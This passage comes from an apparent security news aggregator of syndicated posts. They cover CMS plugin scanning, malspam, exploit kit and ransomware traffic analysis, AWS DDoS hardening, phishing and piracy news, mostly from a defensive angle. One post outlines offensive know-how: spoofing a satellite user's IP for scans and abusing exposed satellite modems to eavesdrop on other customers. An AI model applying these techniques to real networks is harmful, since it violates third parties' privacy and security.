CMS, or Content Management Systems, have become very popular today. It’s easy to deploy WordPress, Drupal or Joomla on top of a UNIX server, and shared platforms also exist which offer you some online space. A CMS delivered with standard options is easy for the owner to customize or tune, just like a car: modern CMS offer a way to extend their features or their look and feel with plugins. From a security perspective, plugins are today the weakest point of a CMS. While most CMS source code is regularly audited and well maintained, the same is not true of their plugins. By deploying and using a plugin, you install third-party code into your website and grant some rights to it. Not all plugins are developed by skilled developers or with security in mind, and today most vulnerabilities reported in CMS environments are due to plugins. In my own logs, I found:

  • 8000+ hits for uninstalled/non-existent plugins
  • 899 unique plugins tested

Just for information, I also compiled a Top-20 of the plugins tested by scanners. If the popularity of a plugin is a good indicator, do not trust it blindly (popularity != security). WordPress has a hardening guide worth reading. As a general piece of advice regarding 4xx HTTP errors, do not implement checks for single errors, but search for multiple 4xx (or 5xx) errors generated in a short amount of time from a single IP address. This is helpful to detect ongoing scans! (A log management solution can do that very easily.)
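To turn that advice into something concrete, here is a minimal sketch; the Apache/nginx combined log format, the window size, and the threshold are assumptions for the example. It flags any client IP that generates more than a handful of 4xx/5xx responses within a short sliding window.

import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)
MAX_ERRORS = 10  # errors allowed per IP inside the window before alerting

# Combined log format (assumed): IP ident user [timestamp] "request" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[^"]*" (\d{3}) ')

errors = defaultdict(deque)

with open("access.log") as handle:  # hypothetical log file
    for raw in handle:
        match = LINE.match(raw)
        if not match:
            continue
        ip, stamp, status = match.groups()
        if status[0] not in ("4", "5"):
            continue
        when = datetime.strptime(stamp.split()[0], "%d/%b/%Y:%H:%M:%S")
        queue = errors[ip]
        queue.append(when)
        while queue and when - queue[0] > WINDOW:
            queue.popleft()
        if len(queue) > MAX_ERRORS:
            print(f"{when} possible scan from {ip}: {len(queue)} errors within {WINDOW}")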
Xavier Mertens
ISC Handler – Freelance Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

    SANS Internet Storm Center, InfoCON: green: A look through the spam filters – examining waves of Upatre malspam, (Thu, Sep 10th)

    This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green


    Any email filtering worth its cost should block numerous messages every day; however, I’m always interested to see what exactly is being blocked. Perhaps the most common type of malicious spam (malspam) I see from the spam filters is Upatre-based malspam.

    I’ve written diaries before about specific waves of Upatre malspam sending the Dyre banking Trojan [1, 2]. I’ve only noticed emails with .zip file attachments from this type of malspam. I recently looked through my organization’s spam filters and found the same thing again. In this case, we found three different themes of malspam sent in a three-hour window, and all had Upatre malware sending Dyre. Let’s take a closer look at these samples of Upatre/Dyre malspam from Wednesday, 2015-09-09.

    A three-hour window of malspam

    Below is an image of blocked malspam with malicious attachments on Wednesday 2015-09-09 from 05:00 to approximately 08:00 CDT.
    Shown above: A three-hour window of blocked malspam from Wednesday, 2015-09-09.

    In this three-hour window, we see several different types of subject lines. Let’s concentrate on the top three:

    Errata Security: Some notes on satellite C&C

    This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

    Wired and Ars Technica have some articles on malware using satellites for command-and-control, based on a paper by Kaspersky. The malware doesn’t hook directly to the satellites, of course. Instead, it sends packets to an IP address of a known satellite user, like a random goat herder in the middle of the wilds of Iraq. Since the satellites beam down to earth using an unencrypted signal, anybody can eavesdrop on it. Thus, while malware sends packets to that satellite downlink in Iraq, it’s actually a hacker in Germany who receives them.

    This is actually fairly old hat. If you look hard enough, somewhere (I think Google Code), you’ll find some code I wrote back around 2011 for extracting IP packets from MPEG-TS streams, for roughly this purpose.
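    For the curious, the transport-stream side of this is not complicated. A minimal sketch that walks 188-byte TS packets and tallies PIDs is shown below; the capture file name is a placeholder, and actually recovering IP packets additionally requires reassembling MPE/DSM-CC sections, which this sketch does not do.

from collections import Counter

TS_PACKET_SIZE = 188
SYNC_BYTE = 0x47

def count_pids(path):
    """Walk an MPEG-TS capture and tally packets per PID (program identifier)."""
    pids = Counter()
    with open(path, "rb") as stream:
        while True:
            packet = stream.read(TS_PACKET_SIZE)
            if len(packet) < TS_PACKET_SIZE:
                break
            if packet[0] != SYNC_BYTE:
                continue  # out of sync; a real tool would resynchronise here
            pid = ((packet[1] & 0x1F) << 8) | packet[2]
            pids[pid] += 1
    return pids

for pid, count in count_pids("capture.ts").most_common(10):  # hypothetical capture file
    print(f"PID 0x{pid:04x}: {count} packets")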

    My idea was to use something like masscan, where I do a scan of the Internet from a fast data center, but spoof that goat herder’s IP address. Thus, everyone seeing the scan would complain about that IP address instead of mine. I would see all the responses by eavesdropping on that satellite connection.

    This doesn’t work in Europe and the United States. These markets use more expensive satellites which not only support encryption, but also narrow “spot beams” that focus on an area of a 100 mile radius.

    Instead, they work well in the Middle East and Africa. These use older, cheaper satellites to provide slow Internet. The streams from these things are usually unencrypted. The NSA loves them, I’m sure.

    The signal for these things bleeds over to Europe, and even the east coast of the United States. Thus, even though we aren’t in the intended service area, we can often get their signal. I keep meaning to setup a satellite dish at home in order to do this — there appear to be several satellites where this should be possible.

    Almost anything can be used to receive the signal.

    Several years ago, a program called “SkyGrabber” hit the news, using Windows and a USB tuner rather than the setup using Linux described in the Ars Technica article. SkyGrabber is designed for porn, both eavesdropping on porn satellite channels and extracting porn images and videos from TCP/IP streams on a satellite network. It made the news because, according to reports, somebody had actually gotten secret military live drone video by pointing their dish at the right satellite and choosing the right channel.

    Another way you can do this is simply with an off-the-shelf SDR (software defined radio) like HackRF. The satellite signal is easy to decode into bits (like 16PSK) and 10b/8b. The stream of bits is then encoded as an MPEG-TS (transport stream) which will carry either video or TCP/IP packets. Therefore, you need some simple software to extract the packets from the stream (hence my project mentioned above). You still need a satellite dish and an LNB, though.

    The easiest way, though, is simple use somebody else’s satellite connection. A lot of these satellite boxes are themselves on the Internet with open web interfaces. You can find these boxes using masscan or Shodan. These boxes then have diagnostic features, such as tcpdump. Many different users are multiplexed onto the same channel. Using tcpdump receives all the packets on that channel, including those intended for another user. Thus, I can find a user in Tunisia and use them to eavesdrop on that goat herder in Iraq — even though they are thousands of miles from each other, they are still on the same satellite channel.

    The economics of satellites are pretty cool. Many are just “bent-pipes”, receiving a signal from one place and beaming it at another. You just go to a satellite company, buy a channel, and set up your own equipment to send/receive anything you want over a range of about a third of the planet. There are a heck of a lot of Christian broadcast channels that do that. There’s also a lot of military use of this — the satellite provider has no way of knowing what’s in that signal. That’s probably how that live drone feed was discovered — some user was flipping through all the Christian broadcast channels looking for a porn feed, and accidentally came across live drone footage. Somebody (not me because I’m lazy) ought to do a survey of the sky using an SDR, cataloging all the mess coming from these satellites. There are already some good resources dedicated to listing all the TV channels, but I’m thinking more needs to be done — especially to find the obviously encrypted stuff.

    SANS Internet Storm Center, InfoCON: green: Querying the DShield API from RTIR, (Thu, Sep 3rd)

    This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

    A few days ago, Tom wrote a diary (1) about RTIR (2) and its REST API. He explained how the tool can be fed with external data. Being a DShield contributor for years (I submit my firewall logs), I like to search for IP address information in the DShield database. By default, RTIR extracts IP addresses from tickets and has an interface to query services like WHOIS servers, to perform a traceroute, or to query any third-party website. RTIR being extremely configurable, why not extend it to query the DShield database using the ISC API (3)!

    IP addresses can be queried directly via the regular ISC website URL, but don’t do this: first of all for performance reasons, but also because the page cannot be displayed in an iframe (which is how RTIR presents it), since it sets the X-Frame-Options header to SAMEORIGIN.

    Results are returned in XML. To integrate DShield lookups into RTIR, follow this procedure.

    1. Create a new page called isc_ipinfo.php on your Apache server running RTIR (or any available HTTP server). This page will receive the IP address, query the DShield API and reformat (basically) the results:

    <?php
    // Field names below follow the ISC/DShield "ip" API schema; adjust them if
    // the XML returned by the API differs.
    $ip = $_GET["ip"];
    if (!filter_var($ip, FILTER_VALIDATE_IP)) {
        die("Invalid IP address!");
    }
    $d = simplexml_load_file("https://isc.sans.edu/api/ip/" . $ip);
    ?>
    <table>
    <tr><td align="right"><b>IP Address:</b></td><td><?php echo $d->number; ?> (<a href="https://isc.sans.edu/ipinfo.html?ip=<?php echo $ip; ?>" target="_blank">Details</a>)</td></tr>
    <tr><td align="right"><b>Network:</b></td><td><?php echo $d->network; ?></td></tr>
    <tr><td align="right"><b>AS:</b></td><td><?php echo $d->{'as'}; ?></td></tr>
    <tr><td align="right"><b>AS Name:</b></td><td><?php echo $d->asname; ?></td></tr>
    <tr><td align="right"><b>AS Size:</b></td><td><?php echo $d->assize; ?></td></tr>
    <tr><td align="right"><b>Country:</b></td><td><?php echo $d->ascountry; ?></td></tr>
    <tr><td align="right"><b>Count:</b></td><td><?php echo $d->count; ?></td></tr>
    <tr><td align="right"><b>Attacks:</b></td><td><?php echo $d->attacks; ?></td></tr>
    <tr><td align="right"><b>Min Date:</b></td><td><?php echo $d->mindate; ?></td></tr>
    <tr><td align="right"><b>Max Date:</b></td><td><?php echo $d->maxdate; ?></td></tr>
    <tr><td align="right"><b>Last Updated:</b></td><td><?php echo $d->updated; ?></td></tr>
    <tr><td align="right"><b>Abuse Contact:</b></td><td><?php echo $d->asabusecontact; ?></td></tr>
    <tr><td align="right"><b>Comment:</b></td><td><?php echo $d->comment; ?></td></tr>
    </table>

    2. Edit your $RTIRHOME/etc/ configuration file and add the new service to $RTIRIframeResearchToolConfig:

    Set($RTIRIframeResearchToolConfig, {
        1 => { FriendlyName => 'SANS ISC IP Info',   URL => 'http://xxxxxxxx/isc_ipinfo.php?ip=__SearchTerm__' },
        3 => { FriendlyName => 'Google',             URL => '...' },
        4 => { FriendlyName => 'CVE',                URL => '...' },
        5 => { FriendlyName => '...',                URL => '...' },
        6 => { FriendlyName => 'McAfee SiteAdvisor', URL => '...' },
        7 => { FriendlyName => 'BFK DNS Logger',     URL => '...' },
    });

    It’s also easy to create new portlets to be used in dashboards. As a bonus, let’s display the ISC Infocon status in an RTIR dashboard.

    1. Create the new portlet in $RTIRHOME/local/html/Elements. Let’s call it InfoconStatus. It displays the ISC Infocon status image inside a title box:

    <&|/Widgets/TitleBox, title => loc("SANS ISC Status") &>
    <img src="..." alt="SANS ISC Infocon Status" />
    </&>

    2. Add InfoconStatus to @RTIR_HomepageComponents in your RTIR configuration:

    Set(@RTIR_HomepageComponents, qw(
        InfoconStatus
        ...
    ));


    Xavier Mertens
    ISC Handler – Freelance Security Consultant

    (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

    AWS Security Blog: How to Help Prepare for DDoS Attacks by Reducing Your Attack Surface

    This post was syndicated from: AWS Security Blog and was written by: Jeffrey Lyon. Original post: at AWS Security Blog

    Distributed denial of service (DDoS) attacks are sometimes used by malicious actors in an attempt to flood a network, system, or application with more traffic, connections, or requests than it can handle. Not surprisingly, customers often ask us how we can help them protect their applications against these types of attacks. To help you optimize for availability, AWS provides best practices that allow you to use the scale of AWS to build a DDoS-resilient architecture. These best practices are discussed in depth in the whitepaper, AWS Best Practices for DDoS Resiliency, which also includes reference architecture to help you better prepare for DDoS attacks and protect the availability of your application.

    It is important to minimize the opportunities an attacker has to target your applications. In the whitepaper, we refer to this as reducing your attack surface. For DDoS attacks, this means restricting the type of traffic that can reach your applications. For example, if you’re building a simple web application, you might only need to expose TCP ports 80 and 443 to the Internet. This presents an opportunity to block traffic from many common DDoS attack vectors that do not communicate on the same port or protocol as your application.

    In this blog post, we will show you how to use Amazon Virtual Private Cloud (VPC) to control access to your applications and minimize public entry points by configuring security groups and network access control lists (ACLs). This is just one of several best practices you should consider when building a DDoS-resilient architecture.

    Common DDoS attacks

    Before diving into a discussion about configuring Amazon VPC, it is important to understand DDoS attack vectors and how minimizing your attack surface can often prevent malicious traffic from reaching your applications. The most common class of DDoS attack is a reflection attack, which is also the most likely to produce a volume of traffic capable of congesting network interfaces and inhibiting legitimate traffic. To launch a reflection attack, the attacker will first scan the Internet for servers hosting User Datagram Protocol (UDP) services such as Simple Service Discovery Protocol (SSDP), Domain Name System (DNS), Network Time Protocol (NTP), and Simple Network Management Protocol (SNMP). Depending on their configuration, these services will often send a response that is many times larger than the initial request. This allows an attacker to send a large volume of small requests with a spoofed source address, resulting in responses that are sometimes tens or even hundreds of times larger. These responses are sent to the spoofed source, which is the target of the DDoS attack.

    The following diagram details how an attacker can use spoofed requests to elicit an amplified response, resulting in a DDoS attack against the victim.

    Figure 1. Distributed reflection denial of service attack

    Configuring security groups

    Reflection attacks allow an attacker to source large volumes of traffic from anywhere in the world using common UDP services. Thankfully, these attacks are also some of the easiest to detect and in many cases can be mitigated by configuring security groups in Amazon VPC. This allows you to control inbound and outbound traffic to your instances by specifically allowing communication only on the ports and protocols required for your applications. Access to any other port or protocol is automatically denied.

    The following diagram provides reference architecture for the configuration of Amazon VPC using the example web application mentioned previously in this post. For more information, see Security Groups for Your VPC.

    Figure 2. Reference architecture with Amazon VPC configuration

    In this reference architecture, we use Amazon VPC configured with a DMZ public subnet and two private subnets. This allows us to create security groups that will permit communication with users and administrators via the Internet, and to create separate security groups for internal resources that are only accessible from the DMZ. For more information about creating and routing subnets in your VPC, see Your VPC and Subnets.

    SSH bastion security group

    The SSH bastion is a single Amazon EC2 instance used to provide secure administrator access and hosting only a Secure Shell (SSH) service. This allows the administrator to connect to TCP port 22 from the Internet or a specified range of Internet addresses. After connecting to the SSH bastion, the administrator can then connect to the web application server and MySQL database server instances. In case of a DDoS attack against this port, only the SSH service would be impacted. This prevents an attacker from using this port to impact the availability of your web application. To minimize the possibility of unauthorized access, only your network’s public IP range should be allowed to communicate with the SSH bastion security group. The following table provides an example of rules you can use to configure the SSH bastion security group. 

    ELB security group

    Elastic Load Balancing (ELB) allows you to achieve greater fault tolerance by automatically routing inbound traffic across multiple Amazon EC2 instances. It also allows you to reduce your attack surface by receiving requests on behalf of your web application and automatically scaling to handle capacity demands. Additionally, ELB is designed to pass only well-formed connections to your web application on ports and protocols that you specify. This provides an additional layer of DDoS resiliency. To allow users to access your web application through an ELB, we will set up a security group that accepts only TCP port 80 and 443 from the Internet and is able to distribute these requests to EC2 instances in the web application server security group. The following table provides an example of rules you can use to configure the ELB security group. 
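    As a sketch of how those ELB rules could be expressed programmatically (the VPC ID and group name are placeholders, and this is an illustration rather than part of the whitepaper), the intent maps directly onto two ingress rules:

import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")  # example region

# Security group for the ELB: only HTTP and HTTPS from the Internet are allowed in.
elb_sg = ec2.create_security_group(
    GroupName="elb-sg",
    Description="ELB: allow web traffic from the Internet",
    VpcId="vpc-0example",  # placeholder VPC ID
)["GroupId"]

ec2.authorize_security_group_ingress(
    GroupId=elb_sg,
    IpPermissions=[
        {"IpProtocol": "tcp", "FromPort": 80, "ToPort": 80,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}]},
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}]},
    ],
)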

    NAT security group

    Because the web application server and MySQL database server in this example are hosted on instances with private subnets, they do not have a route either directly in from or out to the Internet. Though this is not required to serve content to users via ELB, it may be desirable to allow instances to connect to the Internet for software updates. To allow the EC2 instances hosting the web and database services to access the Internet, we will create a network address translation (NAT) instance inside its own security group. With a NAT instance, you can securely route traffic from private subnets out to the Internet, while denying any inbound connectivity from the Internet. For more information, see NAT Instances.

    Web application server security group

    This security group contains all EC2 instances that serve content on behalf of the web application. These EC2 instances will accept web application requests only from the ELB. In an effort to minimize the attack surface, these instances are assigned only private IP addresses from the VPC subnet address range, which prevents them from being accessed directly via the Internet. Instead, we will configure the web application server security group to permit only TCP port 80 and 443 traffic from the ELB security group and TCP port 22 from the SSH bastion security group (for administrator access). The following table provides an example of rules you can use to configure the web application server security group.

    MySQL database server security group

    Similarly, we want to ensure that the MySQL database server is only accessible from the EC2 instances hosting the web application. To achieve this, we assign MySQL database server instances private IP addresses from the back-end private subnet IP address range and configure the MySQL database server security group to allow TCP port 3306 connections only from EC2 instances in the web application server security group. The following table provides an example of rules you can use to configure the MySQL database server security group.

    Configuring network ACLs

    Network ACLs provide an additional layer of defense for your VPC by allowing you to create stateless allow and deny rules that are processed in numeric order, much like a traditional firewall. This is useful for allowing or denying traffic at a subnet level, as opposed to security groups that allow traffic at an EC2 instance level. For example, if you have identified Internet IP addresses or ranges that are unwanted or potentially abusive, you can block them from reaching your application with a deny rule. You can decide whether to create rules that target an entire IP subnet or an individual IP address. The following table is an example of a custom network ACL that complements the security groups discussed earlier in this post. This can be applied to the public subnet. For more information, see Network ACLs. (For more information about how to select the appropriate ephemeral port range [from 1024-65535] in the network ACL, see Ephemeral Ports.)
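    For example, a deny rule for a single abusive source range could be added to the public subnet's network ACL like this (the ACL ID and CIDR block are placeholders; the rule number just needs to be lower than the allow rules so it is evaluated first):

import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")  # example region

# Deny all traffic from a known-abusive range before any allow rules are evaluated.
ec2.create_network_acl_entry(
    NetworkAclId="acl-0example",   # placeholder network ACL ID
    RuleNumber=90,                 # lower than the allow rules so it wins
    Protocol="-1",                 # all protocols
    RuleAction="deny",
    Egress=False,                  # inbound rule
    CidrBlock="198.51.100.0/24",   # placeholder (TEST-NET-2) range
)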

    Other best practices to consider

    Configuring security groups and network ACLs in Amazon VPC is an effective tool to help reduce the attack surface of your applications. The approaches may seem similar, but each has an important role in surface area reduction. This is especially important in a DDoS context because security groups allow you to define the traffic that will be allowed access to resources within your applications, and network ACLs allow you to define the port, protocol, and source of traffic that should be explicitly denied at the subnet level. Now that you’ve configured two key security features of VPC, you should consider other components of your DDoS-resilient architecture, such as monitoring with Amazon CloudWatch and scaling with Amazon CloudFront, Amazon Route 53, Elastic Load Balancing, and Auto Scaling.

    I hope that this blog post will help you build more secure applications on AWS. If you have any questions about how to reduce your attack surface with Amazon VPC, please post a comment below.

    – Jeffrey Lyon, AWS Edge Services

    TorrentFreak: Aussie Piracy Notices Delayed But Lawsuits Are Coming

    This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

    warningAfter years of wrangling, on September 1, 2015, Australian ISPs will take the historic step of implementing a new anti-piracy scheme, one that will see Internet users issued with escalating warning notices designed to bring a halt to their pirating ways.

    Well, at least that was the plan when a draft anti-piracy code was laid down in April. Almost predictably, however, that deadline will come and go without event.

    The problem – and this will come as zero surprise to those who have followed this process for the past several years – is one related to costs.

    Money, money, money

    Since the beginning of negotiations, rightsholders have insisted that ISPs should pick up varying percentages of the bills incurred when sending piracy warnings to their subscribers. Equally, ISPs have insisted that if rightsholders want notices sent out, they should be the ones to pay.

    This dispute has brought the parties to deadlock several times during years of negotiations, and has derailed talks completely more than once, most recently in 2012. However, this year – with the government breathing down their necks – rightsholders and ISPs agreed most aspects of how the notices would be handled, but left the issue of costs until another day.

    That day has now arrived and still there are disputes. With the launch of the scheme supposedly just next week, ITNews reports that during an industry briefing this morning it was revealed that the parties are still arguing over who will pay for the 200,000 notices set to go out in the scheme’s first year.

    For their part, rightsholders think that the ISPs should help with the costs, in part because it is their customers carrying out the infringements. They also believe that if ISPs foot part of the bill, they will be keen to keep costs down.

    On the other hand, ISPs insist that if the notices prove effective in cutting piracy and driving up sales, rightsholders will get the benefit so should therefore pay the bill.

    Countering, rightsholders also point to the bigger picture, one in which ISPs are increasingly becoming the conduit for providing entertainment content to subscribers.

    “As ISPs increasingly become content providers, the business imperative to make sure people are valuing those services will become more and more important [to them],” says Foxtel director of corporate affairs Bruce Meagher.

    So how much is the whole thing likely to cost? According to figures obtained by ITNews, there is dispute there too.

    Too expensive to reduce piracy?

    ISPs say that the bill could amount to $27 per IP address targeted, while rightsholders suggest that the figure would be more like $6. A report commissioned by the parties earlier this year concluded that the cost will be closer to the $27 suggested by the ISPs.

    That cost is too high. As previously seen in New Zealand, “strikes” schemes with high costs are rendered pointless.

    “We saw that in New Zealand where the government mandated $25 per IP address, and no-one used the scheme,” Meagher says. “We’ve got to work out a way of setting a price that encourages the scheme to be used.”

    If in doubt, send the lawyers out

    But even though agreement could take a while to reach, there are those in the entertainment industry already looking ahead to what might happen once people start receiving warning notices. Speaking with SBS, Village Roadshow co-founder Graham Burke says that if the notices don’t prove enough of a deterrent, legal action will be the next step.

    “Yes, [piracy] is wrong. [Downloaders] have been warned, and sent notices that they’re doing the wrong thing. Yes we will sue people,” Burke said.

    Asked by interviewer Marc Fennell whether there is any fear of a backlash should the industry start suing single parents and grandmothers (as they have done in the past), Burke dismissed the concerns.

    “It was really just a couple of instances of a bad news day, where [the press] picked up a couple of instances of a single pregnant mother,” he said.

    But would just a couple of those stories prove damaging?

    “Not if it’s seen in the context that it is theft, and they have been doing the wrong thing, and they’ve been sent appropriate notices, and they’ve been dealt with accordingly. We’re certainly not going to be seeking out single pregnant mothers,” Burke said.

    Confronted with the likelihood that some people will simply hide their activities by using a VPN, Burke played down the fears.

    “I think that if people are appealed to in the right way, they’ll react appropriately,” he said.

    Site blocking

    Finally, after site-blocking legislation was passed earlier this year, Burke has now confirmed that his company will take action soon.

    “We are going through the legal preparation at this stage and will be ready in October to go to the courts and ask them to block sites,” he concludes.

    Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

    SANS Internet Storm Center, InfoCON: green: Actor that tried Neutrino exploit kit now back to Angler, (Wed, Aug 26th)

    This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green


    Last week, we saw the group behind a significant amount of Angler exploit kit (EK) traffic switch to Neutrino EK [1]. We didn't know if the change was permanent, and I also noted that criminal groups using EKs have quickly changed tactics in the past. This week, the group is back to Angler EK.

    Over the past few days, I've noticed several examples of Angler EK pushing TeslaCrypt 2.0 ransomware. For today's diary, we'll look at four examples of Angler EK on Tuesday 2015-08-25 from 16:42 to 18:24 UTC. All examples delivered the same sample of TeslaCrypt 2.0 ransomware.

    TeslaCrypt 2.0

    TeslaCrypt is a recent family of ransomware that first appeared early this year. It's been known to mimic CryptoLocker, and we've seen it use the names TeslaCrypt and AlphaCrypt in previous infections [2,3,4]. According to Kaspersky Lab, version 2.0 of TeslaCrypt uses the same type of decrypt instructions as CryptoWall [5]. However, artifacts and traffic from the infected host reveal this is actually TeslaCrypt.

    Kafeine from Malware Don't Need Coffee first tweeted about the new ransomware on 2015-07-13 [6]. The next day, Kaspersky Lab released details on this most recent version of TeslaCrypt [5].

    I saw my first sample of TeslaCrypt 2.0 sent from Nuclear EK on 2015-07-20 [7]. We've run across more TeslaCrypt 2.0 samples since then; however, we haven't seen a great deal of it. Until recently, most of the ransomware delivered by Angler EK was CryptoWall 3.0. This time, however, the iframes pointed to Angler EK. In most cases, the iframe led directly to the Angler EK landing page.

    Shown above: From the third example, the iframe pointing to an Angler EK landing page.
    Shown above: From the fourth example, the iframe pointing to an Angler EK landing page.

    Looking at the traffic in Wireshark, we find two different IPs and four different domains from the four Angler infections during a 1 hour and 42 minute time span. Although Angler EK sends its payload encrypted, I was able to grab a decrypted copy from an infected host before it deleted itself.
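
    If you want to reproduce this kind of review from a capture of your own, a quick way to list the HTTP requests (and therefore the EK domains and landing pages) is tshark; the pcap file name below is a placeholder.

    # List timestamp, destination IP, Host header, and URI for every HTTP request in the capture.
    tshark -r infection-traffic.pcap -Y http.request -T fields -e frame.time -e ip.dst -e http.host -e http.request.uri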

    • File name: 2015-08-25-Angler-EK-payload-TeslaCrypt-2.0.exe
    • File size: 346.9 KB (355,239 bytes)
    • MD5 hash: 4321192c28109be890decfa5657fb3b3
    • SHA1 hash: 352f81f9f7c1dcdb5dbfe9bee0faa82edba043b9
    • SHA256 hash: 838f89a2eead1cfdf066010c6862005cd3ae15cf8dc5190848b564352c412cfa
    • Detection ratio: 3 / 49
    • First submission: 2015-08-25 19:51:01 UTC
    • Virus Total analysis: link
    • analysis: link
    • analysis: link
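
    If you grab a copy of the payload for your own analysis, it is worth confirming that it matches the hashes listed above before doing anything else. A minimal check from a Linux analysis host might look like this (adjust the file name and path as needed):

    md5sum 2015-08-25-Angler-EK-payload-TeslaCrypt-2.0.exe
    sha256sum 2015-08-25-Angler-EK-payload-TeslaCrypt-2.0.exe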

    The following post-infection traffic was seen from the four infected hosts:

    • – TCP port 80 (http) – IP address check
    • – TCP port 80 (http)- – post-infection callback
    • – TCP port 80 (http) – – post-infection callback

    Malwr.com's analysis of the payload reveals additional IP addresses and hosts:

    • – TCP port 80 (http) –
    • – TCP port 80 (http) –
    • – TCP port 80 (http) –
    • – TCP port 80 (http) –
    • – TCP port 443 (encrypted) –
    • – TCP port 443 (encrypted) –

    Snort-based alerts on the traffic

    I played back the pcap on Security Onion using Suricata with the EmergingThreats (ET) and ET Pro rule sets. The results show alerts for Angler EK and AlphaCrypt. The AlphaCrypt alerts triggered on callback traffic from TeslaCrypt 2.0.

    Shown above: Got a captcha when trying one of the URLs.
    Shown above: Final decrypt instructions with a bitcoin address for the ransom payment.
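
    For readers who want to reproduce the alerts, a saved pcap can be replayed through a standalone Suricata install in roughly the following way; the file and log paths are placeholders, and the exact alerts depend on which ET rules you have loaded.

    # Read the capture offline; -k none skips checksum validation, which is common for replayed traffic.
    suricata -r 2015-08-25-Angler-EK-traffic.pcap -l /tmp/suricata-logs -k none
    # Then look for the EK and ransomware callback alerts.
    grep -iE "angler|alphacrypt" /tmp/suricata-logs/fast.log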

    Final words

    On the same cloned host with the same malware, we saw a different URL for the decrypt instructions each time. Every infection resulted in a different bitcoin address for the ransom payment, even though it was the same sample infecting the same cloned host.

    We continue to see EKs used by this and other criminal groups to spread malware. Although we haven't seen as much CryptoWall this week, the situation could easily change in a few days' time.

    Traffic and malware for this diary are listed below:

    • A zip archive of four pcap files with the infection traffic from Tuesday 2015-08-25 is available here (4.14 MB).
    • A zip archive of the malware and other artifacts is available here (957 KB).

    The zip archive for the malware is password-protected with the standard password. If you don't know it, email and ask.

    Brad Duncan
    Security Researcher at Rackspace
    Blog: – Twitter: @malware_traffic



    (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

    SANS Internet Storm Center, InfoCON: green: Dropbox Phishing via Compromised WordPress Site, (Tue, Aug 25th)

    This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

    I got a couple of emails today notifying me of a Compulsory Email Account Update for my Dropbox account. The e-mails do overall mimic the Dropbox look and feel, but the From address they use has nothing to do with Dropbox.

    First of all, the email is sent from a domain owned by an e-mail marketing service, and that domain does publish SPF records. The IP address the e-mail was sent from is not included in them:

    spf2.0/pra,mfrom ~all
    v=spf1 ip4: ip4: ?all

    But note the ?all part, which specifies that for all IPs not listed, the result is neutral, which usually means the e-mail is accepted. So in the end, it kind of invalidates the SPF record, but a spam filter could still include that fact in its score.
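
    If you want to check a sender domain's published policy yourself, the SPF data lives in the domain's TXT records and can be pulled with dig; example.com below is a placeholder for the actual sending domain.

    dig +short TXT example.com | grep -i spf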

    Moving on to our spam filter. Our not particularly well-tuned SpamAssassin implementation gave it a score of 33! For example, URLs listed in the email are blacklisted, and the e-mail agent (Outlook) does not match the layout of the MIME message.

    Should the email arrive in your inbox, you may be tempted to click on it. The attacker did not attempt to obfuscate the URL. Your browser will be directed straight to a .vn (Vietnam) site. The site is already blacklisted and your browser is likely going to warn you about it. It appears, based on the URL, that the attacker compromised a WordPress site to upload a simple phishing form. The form will offer the victim a number of different e-mail services to choose from, in order to verify the user's credentials. No matter which e-mail address / password is used, the victim will then be directed to a Google page.

    So there are many reasons why a user should NOT fall for this email. But why do users still click even on simple emails like this?

    – These e-mails tend to be most successful very early on in their life cycle, before blacklists pick up on them (I looked at the email a couple of hours after it arrived in my inbox)
    – Phishing is a numbers game. Out of thousands of phishing e-mails, only a few users will click and even fewer will enter their credentials. But then again, sending these emails is cheap
    – Do not assume that all attackers are successful and rolling in cash made from their illicit ventures. Just like other criminal undertakings, there are a few who make money, and an awful lot who live in their mom's basement and dream of making money but don't have the skills to do it.

    Johannes B. Ullrich, Ph.D.

    (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

    TorrentFreak: 75,000 Popcorn Time Users in Crosshairs of Anti-Piracy Group

    This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

    Less than 18 months since its original launch in 2014 and the controversial Popcorn Time software is still making headlines. The application’s colorful and easy to use interface has proven a hit with users and now anti-piracy groups in the United States and Europe are fighting back.

    Last month Norwegian anti-piracy group Rettighets Alliansen (Rights Alliance) blamed Popcorn Time for a piracy explosion in the country and warned that it was monitoring pirates. More information is now being made available.

    Norway has a population of just over 5.1m and it’s estimated that around 750,000 obtain video from illegal sources. However, it’s now being claimed that a third of those – 250,000 – are using Popcorn Time on a weekly basis. Rights Alliance says it has been watching them closely.

    According to Rights Alliance chief Willy Johansen, his organization is now in possession of a database containing information on between 50,000 and 75,000 suspected Popcorn Time pirates. The only question now is what the group will decide to do with the data.

    “We are sitting today with a record of some users of [Popcorn Time] in Norway. These are records we can lawfully use, and it could be that someone gets a little surprise in the mail in the form of a letter. It’s probable that something will happen in the fall,” Johansen says.

    If Rights Alliance follows through with its threats it will mark the first time that regular users have been targeted since copyright law was tweaked two years ago.

    In 2013 a change in legislation enabled copyright holders to apply to the government for permission (granted to Hollywood in Nov 2013) to scan file-sharing networks for infringements. Other changes mean that harvested IP addresses can now be converted to real-life identities with the help of the courts and ISPs.

    But according to Bjørgulv Vinje Borgundvåg at the Ministry of Culture, yet more changes could be on the way.

